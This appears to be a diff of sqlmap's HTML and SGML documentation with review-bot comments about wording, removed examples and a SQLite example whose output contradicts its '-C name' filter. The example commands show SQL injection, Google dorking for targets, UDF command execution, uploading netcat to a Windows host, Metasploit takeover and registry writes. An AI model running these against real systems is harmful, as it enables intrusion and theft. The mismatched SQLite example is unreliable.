diff --git a/doc/README.html b/doc/README.html index ef1899571..0c2b0824d 100644 --- a/doc/README.html +++ b/doc/README.html @@ -361,7 +361,7 @@ list of specific parameter(s) to test. requests (multi-threading) to speed up the blind SQL injection techniques. Vice versa, it is also possible to specify the number of seconds to hold between each HTTP(S) request. Others optimization switches -to speed up the exploitation are implemented as well. +to speed up the exploitation are implemented too.
Cookie
header string support, useful when the
web application requires authentication based upon cookies and you have
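Review bot: the wording change from "as well" to "too" in this hunk is purely stylistic and leaves the real defect in the same sentence untouched: the context line "Others optimization switches" should read "Other optimization switches". Since this line is already being modified, fix the article in the same change rather than in a follow-up.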
@@ -1132,33 +1132,6 @@ first 100 results for the Google dork expression with GET
parameters asking you if you want to test and inject on each possible
affected URL.
-Example of Google dorking with expression site:yourdomain.com
-ext:php
:
-
-
-$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1
-
-[hh:mm:38] [INFO] first request to Google to get the session cookie
-[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
-testable hosts
-[hh:mm:41] [INFO] sqlmap got a total of 59 targets
-[hh:mm:40] [INFO] url 1:
-GET http://yourdomain.com/example1.php?foo=12, do you want to test this
-url? [y/N/q] n
-[hh:mm:43] [INFO] url 2:
-GET http://yourdomain.com/example2.php?bar=24, do you want to test this
-url? [y/N/q] n
-[hh:mm:42] [INFO] url 3:
-GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
-want to test this url? [y/N/q] y
-[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
-[...]
-
-
-
-
-
Switch: -c
Rather than using all hosts parsed from provided logs with switch
-l
, you can specify valid Python regular expression to be used
for filtering desired ones.
Example usage:
+Example of valid syntax:
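Review bot: deleting the entire Google-dork session leaves the -g switch with a prose description and no command line at all, while every other switch in this document keeps at least a one-line usage example. Keep the single command line '$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1' even if the interactive transcript is dropped; the per-URL confirmation prompt it showed ("do you want to test this url? [y/N/q]") is what lets an operator limit testing to the hosts actually in scope, and the remaining prose only alludes to it. In the second part of the hunk, the lead-in is renamed to "Example of valid syntax:" but the sentence above it still reads "you can specify valid Python regular expression"; add the article ("a valid Python regular expression") while this paragraph is being touched.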
@@ -1983,22 +1956,23 @@ database name is not specified, the current database name is used.
You can also provide the -C
option to specify the table columns
name like the one you provided to be enumerated.
-Example against a MySQL target:
+Example against a SQLite target:
-$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --columns -D testdb \
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb \
-T users -C name
[...]
-Database: testdb
+Database: SQLite_masterdb
Table: users
-[2 columns]
-+---------+---------------+
-| Column | Type |
-+---------+---------------+
-| name | varchar(500) |
-| surname | varchar(1000) |
-+---------+---------------+
+[3 columns]
++---------+---------+
+| Column | Type |
++---------+---------+
+| id | INTEGER |
+| name | TEXT |
+| surname | TEXT |
++---------+---------+
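Review bot: the new SQLite output in this hunk contradicts the command it illustrates. The command still passes "-T users -C name", and the context just above explains that -C restricts enumeration to columns whose name is like the one given, yet the replacement table "[3 columns]" lists "id", which does not match "name" (the old MySQL output listing only "name" and "surname" was consistent with the filter). Either drop "-C name" from the command or remove the "id" row from the output. The command also passes "-D testdb" while the output reports "Database: SQLite_masterdb"; if -D is not meaningful for SQLite, remove it from the example or say so in the prose so readers do not expect the filter to apply.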
@@ -2028,7 +2002,7 @@ database name is used.
-$ python sqlmap.py -u "http://debiandev/sqlmap/firebird/get_int.php?id=1" --dump -T users
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
@@ -2208,41 +2182,11 @@ sqlmap can also remove them from the database for you.
These techniques are detailed in the white paper
Advanced SQL injection to operating system full control.
-Example against a PostgreSQL target:
-
-
-
-$ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
-
-[...]
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: PostgreSQL
-
-which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
-how many user-defined functions do you want to create from the shared library? 1
-what is the name of the UDF number 1? sys_eval
-how many input parameters takes UDF 'sys_eval'? (default: 1)
-what is the data-type of input parameter number 1? (default: text)
-what is the data-type of the return value? (default: text)
-do you want to call your injected user-defined functions now? [Y/n/q] y
-which UDF do you want to call?
-[1] sys_eval
-[q] Quit
-> 1
-what is the value of the parameter number 1 (data-type: text)? echo test
-do you want to retrieve the return value of the UDF? [Y/n]
-return value: 'test'
-
-do you want to call this or another injected UDF? [Y/n] n
-do you want to remove UDF 'sys_eval'? [Y/n] y
-[12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only
-be deleted manually
-
-
-
+Use switch -
-udf-inject
and follow the instructions.
If you want, you can specify the shared library local file system path
-via command line using -
-shared-lib
option.
+via command line too by using -
-shared-lib
option. Vice
+versa sqlmap will ask you for the path at runtime.
This feature is available only when the database management system is
MySQL or PostgreSQL.
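Review bot: "Vice versa sqlmap will ask you for the path at runtime" uses the wrong connective; the intended meaning is "Otherwise sqlmap will ask you for the path at runtime". "via command line too by using -shared-lib option" is also awkward; "on the command line with the --shared-lib option" is enough. More importantly, removing the PostgreSQL session deletes the only statement of a cleanup caveat that is not repeated anywhere in the remaining text: "remember that UDF shared object files saved on the file system can only be deleted manually". The surrounding prose says sqlmap can remove the injected UDFs, so without that sentence a reader will assume the shared object is removed as well; carry the warning over into the prose that stays. Finally, in this HTML hunk the long options are split as "-" at the end of one line and "-udf-inject" / "-shared-lib" at the start of the next; confirm the generated HTML renders them as --udf-inject and --shared-lib.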
@@ -2271,7 +2215,7 @@ file:
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
--file-read "C:/example.exe" -v 1
[...]
@@ -2282,14 +2226,14 @@ back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
-C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.131/files/C__example.exe'
+C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.129/files/C__example.exe'
[...]
-$ ls -l output/192.168.136.131/files/C__example.exe
--rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131/files/C__example.exe
+$ ls -l output/192.168.136.129/files/C__example.exe
+-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
-$ file output/192.168.136.131/files/C__example.exe
-output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
+$ file output/192.168.136.129/files/C__example.exe
+output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
80386 32-bit
@@ -2320,7 +2264,7 @@ $ file /tmp/nc.exe.packed
$ ls -l /tmp/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" --file-write \
+$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
"/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
[...]
@@ -2483,7 +2427,7 @@ slide deck
-$ python sqlmap.py -u "http://192.168.136.128/sqlmap/mysql/get_int_51.aspx?id=1" \
+$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int_51.aspx?id=1" \
--os-pwn -v 1 --msf-path /tmp/metasploit
[...]
@@ -2552,7 +2496,7 @@ provided key, with -
-reg-data
value data, while with
-$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
+$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
--reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
diff --git a/doc/README.pdf b/doc/README.pdf
index 8652d3735..1a6f6a575 100644
Binary files a/doc/README.pdf and b/doc/README.pdf differ
diff --git a/doc/README.sgml b/doc/README.sgml
index 1163863a8..7e3509947 100644
--- a/doc/README.sgml
+++ b/doc/README.sgml
@@ -1053,31 +1053,6 @@ first 100 results for the Google dork expression with GET
parameters asking you if you want to test and inject on each possible
affected URL.
-
-Example of Google dorking with expression site:yourdomain.com
-ext:php:
-
-
-$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1
-
-[hh:mm:38] [INFO] first request to Google to get the session cookie
-[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
-testable hosts
-[hh:mm:41] [INFO] sqlmap got a total of 59 targets
-[hh:mm:40] [INFO] url 1:
-GET http://yourdomain.com/example1.php?foo=12, do you want to test this
-url? [y/N/q] n
-[hh:mm:43] [INFO] url 2:
-GET http://yourdomain.com/example2.php?bar=24, do you want to test this
-url? [y/N/q] n
-[hh:mm:42] [INFO] url 3:
-GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
-want to test this url? [y/N/q] y
-[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
-[...]
-
-
-
Load options from a configuration INI file
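Review bot: this hunk removes the only usage example for the -g switch from the SGML source, so the generated HTML and PDF lose it too. Keep at least the command line '$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1' so the Google-dork section is consistent with the rest of the document, where every switch keeps a minimal example, and so the per-URL confirmation prompt ("do you want to test this url? [y/N/q]") that constrains testing to in-scope hosts is still shown rather than only described.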
@@ -1355,7 +1330,7 @@ Rather than using all hosts parsed from provided logs with switch
-l, you can specify valid Python regular expression to be used
for filtering desired ones.
-Example usage:
+Example of valid syntax:
$ python sqlmap.py -l burp.log --scope="(www)?\.target\.(com|net|org)"
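Review bot: the lead-in is renamed to "Example of valid syntax:" but the sentence above it in the context, "you can specify valid Python regular expression to be used for filtering desired ones", is missing its article and would read better as "you can specify a valid Python regular expression to filter the desired ones"; fix it in the same change since this paragraph is already being edited.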
@@ -2019,21 +1994,22 @@ You can also provide the -C option to specify the table columns
name like the one you provided to be enumerated.
-Example against a MySQL target:
+Example against a SQLite target:
-$ python sqlmap.py -u "http://debiandev/sqlmap/mysql/get_int.php?id=1" --columns -D testdb \
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb \
-T users -C name
[...]
-Database: testdb
+Database: SQLite_masterdb
Table: users
-[2 columns]
-+---------+---------------+
-| Column | Type |
-+---------+---------------+
-| name | varchar(500) |
-| surname | varchar(1000) |
-+---------+---------------+
+[3 columns]
++---------+---------+
+| Column | Type |
++---------+---------+
+| id | INTEGER |
+| name | TEXT |
+| surname | TEXT |
++---------+---------+
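Review bot: same inconsistency as in the HTML copy of this example: the command keeps "-T users -C name", which the preceding context defines as restricting enumeration to columns whose name is like the one given, but the replacement "[3 columns]" output includes "id", which does not match "name". Drop "-C name" from the command or drop the "id" row from the output. Likewise "-D testdb" is passed while the output says "Database: SQLite_masterdb"; if -D is ignored for SQLite, remove it from the example or state that in the prose.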
@@ -2065,7 +2041,7 @@ database name is used.
Example against a Firebird target:
-$ python sqlmap.py -u "http://debiandev/sqlmap/firebird/get_int.php?id=1" --dump -T users
+$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
@@ -2267,39 +2243,12 @@ These techniques are detailed in the white paper
name="Advanced SQL injection to operating system full control">.
-Example against a PostgreSQL target:
-
-
-$ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
-
-[...]
-web application technology: PHP 5.2.6, Apache 2.2.9
-back-end DBMS: PostgreSQL
-
-which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
-how many user-defined functions do you want to create from the shared library? 1
-what is the name of the UDF number 1? sys_eval
-how many input parameters takes UDF 'sys_eval'? (default: 1)
-what is the data-type of input parameter number 1? (default: text)
-what is the data-type of the return value? (default: text)
-do you want to call your injected user-defined functions now? [Y/n/q] y
-which UDF do you want to call?
-[1] sys_eval
-[q] Quit
-> 1
-what is the value of the parameter number 1 (data-type: text)? echo test
-do you want to retrieve the return value of the UDF? [Y/n]
-return value: 'test'
-
-do you want to call this or another injected UDF? [Y/n] n
-do you want to remove UDF 'sys_eval'? [Y/n] y
-[12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only
-be deleted manually
-
+Use switch --udf-inject and follow the instructions.
If you want, you can specify the shared library local file system path
-via command line using --shared-lib option.
+via command line too by using --shared-lib option. Vice
+versa sqlmap will ask you for the path at runtime.
This feature is available only when the database management system is
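Review bot: "Vice versa sqlmap will ask you for the path at runtime" should be "Otherwise sqlmap will ask you for the path at runtime", and "via command line too by using --shared-lib option" reads better as "on the command line with the --shared-lib option". Deleting the PostgreSQL session also deletes the only mention of the cleanup caveat "remember that UDF shared object files saved on the file system can only be deleted manually"; since the remaining context says sqlmap can remove the UDFs for you, the prose should state explicitly that the shared library left on the target's file system is not removed and must be deleted by hand.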
@@ -2332,7 +2281,7 @@ Example against a Microsoft SQL Server 2005 target to retrieve a binary
file:
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" \
--file-read "C:/example.exe" -v 1
[...]
@@ -2343,14 +2292,14 @@ back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
-C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.131/files/C__example.exe'
+C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.129/files/C__example.exe'
[...]
-$ ls -l output/192.168.136.131/files/C__example.exe
--rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131/files/C__example.exe
+$ ls -l output/192.168.136.129/files/C__example.exe
+-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
-$ file output/192.168.136.131/files/C__example.exe
-output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
+$ file output/192.168.136.129/files/C__example.exe
+output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
80386 32-bit
@@ -2383,7 +2332,7 @@ $ file /tmp/nc.exe.packed
$ ls -l /tmp/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
-$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" --file-write \
+$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write \
"/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
[...]
@@ -2554,7 +2503,7 @@ name="Expanding the control over the operating system from the database">.
Example against a MySQL target:
-$ python sqlmap.py -u "http://192.168.136.128/sqlmap/mysql/get_int_51.aspx?id=1" \
+$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int_51.aspx?id=1" \
--os-pwn -v 1 --msf-path /tmp/metasploit
[...]
@@ -2634,7 +2583,7 @@ provided key, with --reg-data value data, while with
A sample command line for adding a registry key hive follows:
-$ python sqlmap.py -u http://192.168.136.128/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
+$ python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
--reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1